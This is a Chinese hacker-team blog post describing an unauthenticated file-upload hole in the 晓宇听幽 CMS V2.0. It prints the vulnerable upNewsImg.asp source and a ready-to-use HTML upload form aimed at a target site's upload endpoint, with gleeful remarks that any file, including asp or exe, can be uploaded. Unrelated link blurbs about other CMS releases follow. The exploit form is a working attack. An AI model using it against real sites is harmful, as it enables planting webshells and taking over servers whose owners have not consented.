晓宇听幽网站内容管理系统 V2.0_漏洞研究

(作者给我们留下后门?)

晓宇听幽网站内容管理系统:

目前最强大整站系统包含一般网站所必须的模块如新闻文章、下载、影视、图片、音乐等各模块相互独立又紧密联系无限分级自由调用支持模板前台全部生成html最大程度节省系统资源大中型门户网站的最佳选择

内容页面是生成html,比较安全,后台地方看了一下,好像也问题不大.

但是转到upload目录,发现两个文件

uploadset.asp upNewsIMg.asp

其中uploadset.asp中做了验证,而upNewsImg.asp中没有任何限制,我们来看一下源代码:

CODE:

<link rel="stylesheet" type="text/css" href="../admin/admin.css">

<script language="JavaScript">

<!-- Hide from older browsers...

//Function to add pic

function Addpic(imagePath){   

  window.opener.frames.message.focus();                     

  window.opener.frames.message.document.execCommand(InsertImage, false, imagePath);

}

// -->

</script>

<% server.scripttimeout=1900 %>

<%

UpFilePath="NewsIMG/"

fileweb="UPLOAD/"

nameset =1

pathset =0

dim i

i=1

%>

<% 

function makefilename(fname)

fname = now()

fname = replace(fname,"-","")

fname = replace(fname," ","") 

fname = replace(fname,":","")

makefilename=fname

end function 

%>

<!--#include FILE="upload_5xsoft.inc"-->

<%

dim upload,file,formName,iCount

dim url,url1

set upload=new upload_5xSoft 建立上传对象

iCount=0

for each formName in upload.file 列出所有上传了的文件

set file=upload.file(formName) 生成一个文件对象

if file.FileSize>0 then       如果 FileSize > 0 说明有文件数据

fname = makefilename(now()) & iCount & "." & GetExtendName(file.FileName)

file.SaveAs Server.mappath(UpFilePath&fname)   保存文件

iCount=iCount+1

response.write"图片"&i&" <input type=""text"" name="""&i&""" size=""55"" style=""border-style: solid; border-width: 1"" value=""../"&fileweb&UpFilePath&fname&"""><br>[ <a href=# onclick=""Addpic(../"&fileweb&UpFilePath&fname&")"">点击这里把图片"&i&"添加到编辑器中</a> ]<br>"

i=i+1

set file=nothing

end if

next

set upload=nothing 删除此对象

function GetExtendName(FileName)

dim ExtName

ExtName = LCase(FileName)

ExtName = right(ExtName,3)

ExtName = right(ExtName,3-Instr(ExtName,"."))

GetExtendName = ExtName

end function

%>

[Copy to clipboard]

哈哈,完全可以自己购造一个上传页面,直接上传,连exe文件都可以,别说asp什么的啦.

而且上传完就有地址,简直就是作者给我们留的一个后门.

利用文件:

CODE:

<html>

<head>

<title>文件上传</title>

<meta http-equiv="Content-Type" content="text/html; charset=gb2312">

</head>

<body bgcolor="#D6EF7E" text="#000000">

<form name="form1" method="post" action="http://www.target.com/upload/upnewsimg.asp" enctype="multipart/form-data">

<input type="hidden" name="act" value="upload">

<div align="center">

  <center>

  <table width="98%" border="0" cellspacing="0" cellpadding="5" bordercolordark="#CCCCCC" bordercolorlight="#000000" style="border-collapse: collapse" bordercolor="#111111" height="102">

    <tr>

    <th height="16" align="left" valign="middle">

    <div align="center">

      <b>图片上传</b>

    </div>

    </th>

    </tr>

    <tr align="left" valign="middle" bgcolor="#eeeeee">

    <td bgcolor="#FFFFFF" height="1" valign="top">

<input type="file" name="file1" style="width:200" class="tx1">

      

    </td>

    </tr>

    <tr align="center" valign="middle">

    <td align="left" id="upid" height="5" bgcolor="#FFFFFF">

    </td>

    </tr>

    <tr align="center" valign="middle" bgcolor="#eeeeee">

    <td bgcolor="#FFFFFF" height="28">

    <input type="submit" name="Submit" value="· 提交 ·" class="bt">

    <input type="reset" name="Submit2" value="· 重执 ·" class="bt"></td>

    </tr>

    <tr align="center" valign="middle" bgcolor="#eeeeee">

    <td height="14" bgcolor="#FFFFFF"> </td>

    </tr>

  </table>

  </center>

</div>

</form>

</body>

</html>

[Copy to clipboard]

百发百中,哈哈.好玩.

我的Blog     http://hhuai.cn

文章坏坏

来源邪恶八进制信息安全团队 

时间: 2024-09-18 10:26:24

晓宇听幽网站内容管理系统 V2.0_漏洞研究的相关文章

gp|Easy CMS 2.3.2发布 网站内容管理系统

gp|Easy是一个功能完整的网站http://www.aliyun.com/zixun/aggregation/10094.html">内容管理系统,用户可以在一个简单易操作的界面建立丰富灵活的网站.它的管理界面是嵌入式设计能够让用户看到浏览器窗口的即时变化. gp|Easy CMS 2.3.2版本主要修复了一些bugs.Gallery.session.高速缓存控制,并更新和得到改善. 软件信息:http://gpeasy.com/ 下载地址: http://gpeasy-cms.goo

盛大在线收购网站内容管理系统研发商Phpcms

天极网7月22日消息,今日盛大在线发布公告,宣布收购内容管理系统研发商phpcms,并在盛大北京研发中心成立后,搬迁至盛大北京研发中心办公. 作为业内领先的内容管理系统,phpcms的产品知名度.占有率一直名列前茅.此次盛大在线对phpcms的并购事宜始于2010年5月,随后启动了相关交接工作.而就在2008年5月,phpcms被酷6网收购. 此次收购,是盛大在线在开源CMS软件方面的一次重要战略布局,对于CMS行业也将产生更深远的影响. 关于phpcms phpcms是一款开源的网站内容管理系

Exponent CMS 2.0.7发布 网站内容管理系统

Exponent CMS 是一款网站http://www.aliyun.com/zixun/aggregation/10094.html">内容管理系统.它允许网站管理者轻松地创建和管理动态的网站,而无需直接编辑代码的网页或管理网站导航.Exponent采用了直观和灵活的内容编辑系统,允许Web页面上编辑的显示页面.因此避免了需要更多的后端管理或导航多个管理页面添加到一个简单的文本行. Exponent CMS 2.0.7该版本着重于除错和增强速度,增加了所见即所得的评论,新formmod

the maker 1.5发布 网站内容管理系统

The maker是一款网站http://www.aliyun.com/zixun/aggregation/10094.html">内容管理系统(CMS).它支持在本地计算机上运行,并通过FTP发布你更新的内容.运行这些的前提条件是需要是一些FTP访问的Web空间. The maker 1.5版本更新日志: 1.添加了链接(外部)项目的支持,他们可以用USB粘贴WebDAV或在你的Dropbox(若已安装到你的文件系统安装).2.有多个U的I改进.3.应用程序被关闭时打开文件,这些文件将在

国外优秀的PHP开源网站内容管理系统

经常听见周围的做设计的朋友想要做一个网站,不仅漂亮而且功能方面能够跟上潮流,varhi 做为一个开源世界的正在入门入门者,给大家介绍几款比较常用开源程序,只要有一点基础的朋友就能建立满足自己业务需求的网站了. 博客:WordPress WordPress可能是生命力最旺盛的个人博客系统了,无数的主题和界面,让任何人独立域名写博客成为可能,wordpress不仅可以做博客系统,还可以广泛应用于各类网络信息发布平台. CMS JoomlaJoomla也是CMS方面的佼佼者,性能良好的插件,和容易编辑

Exponent CMS 2.0发布 网站内容管理系统

Exponent CMS 2.0自RC2以来,修复了很多错误及功能,包括:数据库和文件的导入/导出;安装可选的示例内容;在新的屏幕上的说明外部设置(键),以获得他们的链接;一个改进的和可配置的微博可查看更多的选项:发送消息的能力:更好的检查第三方库的错误(邮件和微博):及更好的从0.9x迁移数据. Exponent CMS是一个网站的http://www.aliyun.com/zixun/aggregation/10094.html">内容管理系统.它允许网站所有者可以轻松地创建和管理动态

WebGUI 7.10.21发布 网站内容管理系统

WebGUI 是一个网站http://www.aliyun.com/zixun/aggregation/8254.html">内容管理框架,能够让一般用户建立和维护复杂的网站.它采用模块化设计,插接式连接,独立平台,在线地使用和管理等等.WebGUI 提供一个完整的主机功能,包括网上购物,订阅,论坛,图片库,常见问题,链接列表,博客,SQL报告,Web服务界面,以及一个非常容易配置的用户权限和分析系统. WebGUI主要特性: -开放源代码促进会(OSI)认证的开放源码软件 -内嵌所见即所

OpenCms 8.0.2发布 Java开发内容管理系统

OpenCms 8.0.2该版本进行了许多重要的和有用的新功能和改进.拖放可以在任何JSP的ADE中实现.您现在可以直接从图形种类拖放. 增加"Break Up"选项组到Group Containers中. 增加XSD路径转换.还增加了更多其它的功能. OpenCms是现在比较游行的使用Java开发http://www.aliyun.com/zixun/aggregation/10094.html">内容管理系统,作为开放源代码的产品,其先天的优势就决定了它光明的未来.

轻松建站 主流ASP内容管理系统横评

内容管理系统|主流 对一个站长来说,网站成功不可缺少的是内容,最重要的也是内容,因此采用动态能后台管理更新的才是首选.作为精力和资金有限的个人站长来说,自己组织开发,显的不太现实.其实,在网络上有很多成熟的CMS系统(Content Management System,内容管理系统).只需要选择一款适合自己的产品,然后再作简单的修改即可使用. 因此选择一款功能强大而又适合自己的CMS系统是一件令人头痛的事,每个CMS系统都有自己的特点,例如有的CMS系统易操作性强,而有的CMS系统针对搜索引擎的